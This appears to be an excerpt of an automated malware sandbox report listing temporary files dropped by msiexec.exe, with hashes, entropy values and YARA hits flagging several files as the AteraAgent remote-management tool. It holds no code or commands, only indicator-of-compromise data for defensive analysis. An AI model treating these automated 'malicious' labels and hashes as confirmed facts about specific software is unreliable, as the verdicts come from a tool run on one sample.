                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:r8PhFuRc06WXz+FT5Sdm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:ShF1jFT8m3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:9E9CA92874801068799CF975C6C84F90
                                                                                                                                                                                                                                                                                                                                  SHA1:233CD27A9FE22100D0DBBBB47BD8970E30106962
                                                                                                                                                                                                                                                                                                                                  SHA-256:15C0CD0E4D28938F1EF82D1EF0F12BCE0175E53A1BA1F1B9F7CDEA661A143A1C
                                                                                                                                                                                                                                                                                                                                  SHA-512:83C5A56BE85A743CF3BB8DBEFFD889E900555CCA765FC9BFDAA53AE309BF3FB15A97812C1AC2832A37E6528288D1C23DEEEC5BFA1940F79A95960230AAA01091
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8B9C4281082EB5A9.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8B9C4281082EB5A9.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF8C6157FE5230C8C7.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2803037319099166
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:1hwu3th8FXzFT56RddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:vw3rTedWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:97FCD8DB13449BB7051CDBBC66340A8E
                                                                                                                                                                                                                                                                                                                                  SHA1:8BD72069DDC94AC7652D506AEBF9C1BC0902B9E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:8411B750B766953310DD9514B4EF04C840DE7BF097669DBF777FE93D27C7563B
                                                                                                                                                                                                                                                                                                                                  SHA-512:92E1295FB946069A1FFA1E3D627B5C01651FAAEB00943A4CE0B21D651D8AA482CA472EB7B27B79FC9E287F4A3A4BEC6EF2B57CD7C71AD9CBCC2430A8EA95E6D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8C6157FE5230C8C7.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF8F3A4106A89D3FAA.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.5652099008809222
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:kk8PhluRc06WXJunT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:yhl1FnT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:4E836F3DC1F6DD87B0B768970901FB58
                                                                                                                                                                                                                                                                                                                                  SHA1:BD5142D32B62A69699501118885819ED7CFC41F8
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A740CB63701F6F99CBF01E7ECA2A5AAD3F0A27E547BB50838DD024281766973
                                                                                                                                                                                                                                                                                                                                  SHA-512:F9C7B777D4C8FF60DFE3D7325ECD0AA9B057C23697000843B964D9B6A942EC7CA11C8E4AF0E721AC8F7FE80DAAC6F6B3FC657275E7FAA898CF36F1BA6097D6FC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8F3A4106A89D3FAA.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF91BDF3C96D5F451B.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2532785006839884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ggduksNveFXJNT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:JdVlT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:D056A4E0BE5F23AFFDD317786ED981BE
                                                                                                                                                                                                                                                                                                                                  SHA1:B13A67B14F3DFDEE3BC37BDEE81CE2450BB5A61E
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC030C812D19ECBFD7CC292E955B78638A158F04318C00BE299ACBB4DAF13C4F
                                                                                                                                                                                                                                                                                                                                  SHA-512:D5E1D5F9DA64F0042BF2E969882D82B289BD03C898280927E0EE673B3BFE49EB284D3328016750A50933DC815A0F76219C66128E982DF2CB9DCD218C22C0DB9B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF91BDF3C96D5F451B.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF91BDF3C96D5F451B.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF91BDF3C96D5F451B.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF93461084664740F6.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3015028554555976
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Jx/jO38PhMuh3iFip1GE2yza2t4KAQBHofagUMClXte/+oAWS+HesXwZymiL:A8PhMuRc06WXOCFT5aXAWSiXwZy9
                                                                                                                                                                                                                                                                                                                                  MD5:2A5B227715CA7D8BE6719C9EAE981221
                                                                                                                                                                                                                                                                                                                                  SHA1:863D008A637B38524033BAED0F4324A04668FAE1
                                                                                                                                                                                                                                                                                                                                  SHA-256:305504B686A4848F0E09C804E97C48DCBAB789334DE7B75F7AB4E85EE20A9891
                                                                                                                                                                                                                                                                                                                                  SHA-512:D4EC0B7D7028C8A1E211EA39BE693A57F7FD1E24BFD7DA90DB8A40834088F3E348CA8FC73FBEB753925F583F6246F07C409B8A16D164FC779A8903F1C290A94E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF95064393B651BB82.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.094953908748899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MxucuA5YHr6gsffcvSOxWX5WclJnJjCL0IcuA5YHr6gsffcvSOxWX5WclJnJjC:2vdGHPssvS8c15dGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:72C2BDF3D07A65200CA34E668DC4AB91
                                                                                                                                                                                                                                                                                                                                  SHA1:F6DF3315F64A44B73C90B7D6034629E4A4276593
                                                                                                                                                                                                                                                                                                                                  SHA-256:058F6F6474964727D496CA4469E2A69F309EB5C0D14D7F522D84B38CFBD09920
                                                                                                                                                                                                                                                                                                                                  SHA-512:496E4FFE72C8B4C645562858FB0255FB96886961D073B4D285A153A6D78E1F8E8238ED66E3FCC295217E548F3C32AF8522164A3CC6F3CC689D955E4AF45E09E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF96B322998E75AD50.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF98A3B0A404DB694E.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2532785006839884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ggduksNveFXJNT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:JdVlT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:D056A4E0BE5F23AFFDD317786ED981BE
                                                                                                                                                                                                                                                                                                                                  SHA1:B13A67B14F3DFDEE3BC37BDEE81CE2450BB5A61E
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC030C812D19ECBFD7CC292E955B78638A158F04318C00BE299ACBB4DAF13C4F
                                                                                                                                                                                                                                                                                                                                  SHA-512:D5E1D5F9DA64F0042BF2E969882D82B289BD03C898280927E0EE673B3BFE49EB284D3328016750A50933DC815A0F76219C66128E982DF2CB9DCD218C22C0DB9B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF98A3B0A404DB694E.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF98EF70557B828906.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.14497609063976058
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:8+FRpFBEuipVGndYipV5nd/EVgdGSLMCltMClMbgNlGPQbQk/+DdMClh+FvFS:979EuSsndYSjnd/EqdGUDjxbQ+Mdm3
                                                                                                                                                                                                                                                                                                                                  MD5:F7BF09AA75259012B8752C95923173E7
                                                                                                                                                                                                                                                                                                                                  SHA1:5FA40B96F09B2515603EED15C3CDF4128AA98C83
                                                                                                                                                                                                                                                                                                                                  SHA-256:D9F31E56CA352189E384810E98E10E189869B26730DEBD54F57394574CDBE82F
                                                                                                                                                                                                                                                                                                                                  SHA-512:95B83EE111C0A27E5E9694A24393D250FE7767AD204BC21CD99BA5FD40EB5D5F4A0EAFDA0D0011242EBD2F5537F0A8BEE2BE612CEBC938C29E4FE6B13314A4DE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF98EF70557B828906.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF9DD36803710B29FB.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07408621563822465
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO16KUJJDVPsMggIXKVky6l1:2F0i8n0itFzDHFcJJFg/p1
                                                                                                                                                                                                                                                                                                                                  MD5:69616F6B87DCE1AE106AFC4BAFAE8BAC
                                                                                                                                                                                                                                                                                                                                  SHA1:1FB9D074C25F93DC3393FB8436FCAD95C4437CA3
                                                                                                                                                                                                                                                                                                                                  SHA-256:2008C7721143B4D962FD1F7985A17EFCA826EB54D263D8030C8DF382DBD6C5D0
                                                                                                                                                                                                                                                                                                                                  SHA-512:03F27A60747CC75094293B252802294C77D37FF98B58B48C6BE09D895F1D66D19E2085F4CECD6435E26E87ABC29610AF1CEA5745A96A2BBC0BD2889370EB4A20
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFAAF33D12ABE7C04D.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFB12BE5BBE496866B.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFB24238352A55AA8D.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFB5C97EA75EFB7BB5.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFB5F0EEAE33313F86.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFBAFD6533B3289355.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2551492331884888
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:e69u5th8FXz/T5idm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:d9RBTkm3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:1D2589CA75F98D7C99E00B483C9F6B67
                                                                                                                                                                                                                                                                                                                                  SHA1:79115956B2C206DE8C8ECBA56EBA54F6D51E8211
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0FC60527FE35549AFCAC0E62DB5744042BEB486E6AE4DB20F73F49BC2BEDF05
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC9B75AEE923AB079E91B60754D5931C664E69C3410F41022FE4C33A1B5BFEE5B23BA280E0FBD3AB0FD9F7C7A66C41F552269565449825DA0A0E0BF50E47C4A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFBAFD6533B3289355.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFBAFD6533B3289355.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFC393EB6E379D383E.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFCAE1D23F3D06CD9C.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
